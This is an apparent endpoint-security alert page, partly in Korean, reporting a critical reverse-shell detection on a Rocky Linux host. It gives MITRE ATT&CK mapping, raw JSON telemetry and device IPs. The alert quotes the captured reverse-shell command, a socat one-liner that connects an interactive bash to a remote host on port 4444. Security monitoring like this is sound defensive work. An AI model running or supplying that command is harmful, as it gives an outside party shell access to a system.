Alert Details - DeFender X

Alert Information Critical

Alert ID: ind:b4aeee57c4b841bc95cb853f0aca95e1:1766234323765078836-30128-7647504
Composite ID: 84393bf974fd44bda943a25a6a7bc27f:ind:b4aeee57c4b841bc95cb853f0aca95e1:1766234323765078836-30128-7647504
설명: A reverse shell has been detected on your host. It may provide adversaries with an interactive terminal. Check the process tree to determine if this access was expected.
호스트: localhost.localdomain
상태: new
생성 시간: 2025-12-20 21:39:45
업데이트 시간: 2025-12-20 22:38:45

MITRE ATT&CK

Tactic: Execution
Technique: Command and Scripting Interpreter

Command Line

bash -c socat exec:'bash -li',pty,stderr tcp:10.10.10.10:4444

Raw JSON Data

{"id":"ind:b4aeee57c4b841bc95cb853f0aca95e1:1766234323765078836-30128-7647504","composite_id":"84393bf974fd44bda943a25a6a7bc27f:ind:b4aeee57c4b841bc95cb853f0aca95e1:1766234323765078836-30128-7647504","agent_id":"b4aeee57c4b841bc95cb853f0aca95e1","cid":"84393bf974fd44bda943a25a6a7bc27f","description":"A reverse shell has been detected on your host. It may provide adversaries with an interactive terminal. Check the process tree to determine if this access was expected.","severity":80,"severity_name":"Critical","confidence":50,"tactic":"Execution","tactic_id":"TA0002","technique":"Command and Scripting Interpreter","technique_id":"T1059","cmdline":"bash -c socat exec:\u0027bash -li\u0027,pty,stderr tcp:10.10.10.10:4444","filename":"bash","filepath":"/usr/bin/bash","sha256":"ec6d007d48ef11bc47ad3f372b4b20ff2f0d4e63867e7e4cc0f1b17b19fa88b2","status":"new","type":"ldt","created_timestamp":"2025-12-20T12:39:45.878199485Z","updated_timestamp":"2025-12-20T13:38:45.924738401Z","device":{"device_id":"b4aeee57c4b841bc95cb853f0aca95e1","cid":"84393bf974fd44bda943a25a6a7bc27f","agent_version":"7.31.18410.0","hostname":"localhost.localdomain","local_ip":"10.24.11.62","external_ip":"211.198.135.5","mac_address":"00-0c-29-89-f8-0a","platform_name":"Linux","os_version":"Rocky Linux 9.6"},"aggregate_id":"aggind:b4aeee57c4b841bc95cb853f0aca95e1:4812415228","CreatedAt":"2025-12-20T21:39:45.8781995+09:00","UpdatedAt":"2025-12-20T22:38:45.9247384+09:00"}

Quick Info

Severity Critical
Score 80
Agent ID b4aeee57c4b841bc95cb853f0aca95e1

Actions

Falcon Console에서 보기 목록으로 돌아가기